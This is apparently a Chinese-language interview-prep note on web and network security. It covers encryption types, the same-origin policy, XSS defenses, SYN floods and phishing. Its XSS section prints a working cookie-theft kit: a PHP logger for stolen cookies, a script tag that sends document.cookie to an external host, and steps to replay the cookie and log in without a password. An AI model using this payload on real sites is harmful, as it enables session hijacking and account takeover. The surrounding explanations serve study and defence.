在面试时,网络安全也会被经常问到,至少要知道常见的攻击,以及防
御措施。在这里 Mark 下,不做深入分析。
对称加密和非对称加密 ?
对称加密:加解密用同一密钥,密钥维护复杂 n(n-1)/2,不适合互联网传输
密钥,加解密效率高。应用于加密数据。
非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就可以,适合于互联
网传输公钥,但是加密效率低,应用于数字签名及加密。
什么是同源策略?
为了防止不同域在用户浏览器中彼此干扰,浏览器对从不同来源(域)收到的内
容进行隔离。
浏览器不允许任何旧有脚本访问一个站点的 cookie,否则,会话容易被劫持。
只有发布 cookie 的站点能够访问这些 cookie,只有通过该站点返回的页面所包
含或加载的 JavaScript 才能访问 cookie。
cookie 存在哪里?可以打开吗?
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Cookies
工具--文件夹选项--查看--将隐藏被保护的文件的对勾去掉就会看到 cookies 文
件夹。
xss 如何盗取 cookie?
攻击者代码:
. <?php
.
$cookie=$_GET['cookie'];
.
$time=date('Y-m-d g:i:s');
..
$referer=getenv('HTTP_REFERER');
.
$cookietxt=fopen('cookie.txt','a');
.
fwrite($cookietxt,"time:".$time." cookie:".$cookie."
referer:".$referer.""); 注意双引号,容易出错
.
fclose($cookietxt);
.
?>
脚本端:
<script>
document.write('<img
src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0
border=0 />');
</script>
获取到 cookie 后,用 firebug 找到 cookie,新建 cookie
加入 cookie,用 referer 来提交,无需输入帐号密码直接登录进去!
xss 有 cookie 一定可以无用户名密码登录吗?
基本可以。因为把 cookie 的值给浏览器,浏览器去访问页面会用已有的
cookie 去访问,如果 cookie 有效,就会直接进去。
xss 如何防御?
1.对前端输入做过滤和编码:
比如只允许输入指定类型的字符,比如电话号格式,注册用户名限制等,
输入检查需要在服务器端完成,在前端完成的限制是容易绕过的;
对特殊字符进行过滤和转义;
2.对输出做过滤和编码:
在变量值输出到前端的 HTML 时进行编码和转义;
3.给关键 cookie 使用 http-only。
SYN 攻击原理
SYN 攻击属于 DOS 攻击的一种,它利用 TCP 协议缺陷,通过发送大量
的半连接请求,耗费 CPU 和内存资源。
SYN 攻击除了能影响主机外,还可以危害路由器、防火墙等网络系统,
事实上 SYN 攻击并不管目标是什么系统,只要这些系统打开 TCP 服务就可以实
施。服务器接收到连接请求(SYN=1),将此信息加入未连接队列,并发送请
求包给客户(syn=k,ack=j+1),此时进入 SYN_RECV 状态。当服务器未收到
客户端的确认包时,重发请求包,一直到超时,才将此条目从未连接队列删除。
配合 IP 欺骗,SYN 攻击能达到很好的效果,通常,客户端在短时间内伪造大量
不存在的 IP 地址,向服务器不断地发送 syn 包,服务器回复确认包,并等待客
户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,这些伪造
的 SYN 包将长时间占用未连接队列,正常的 SYN 请求被丢弃,目标系统运行
缓慢,严重者引起网络堵塞甚至系统瘫痪。
什么是网络钓鱼?
网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾
邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、ATMPIN 码或
信用卡详细信息)的一种攻击方式。
最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的
网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通
常这个攻击过程不会让受害者警觉。
它常常导引用户到 URL 与接口外观与真正网站几无二致的假冒网站输入
个人数据。就算使用强式加密的 SSL 服务器认证,要侦测网站是否仿冒实际上
仍很困难。网钓是一种利用社会工程技术来愚弄用户的实例。它凭恃的是现行网
络安全技术的低亲和度。
特别声明:
此为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。!!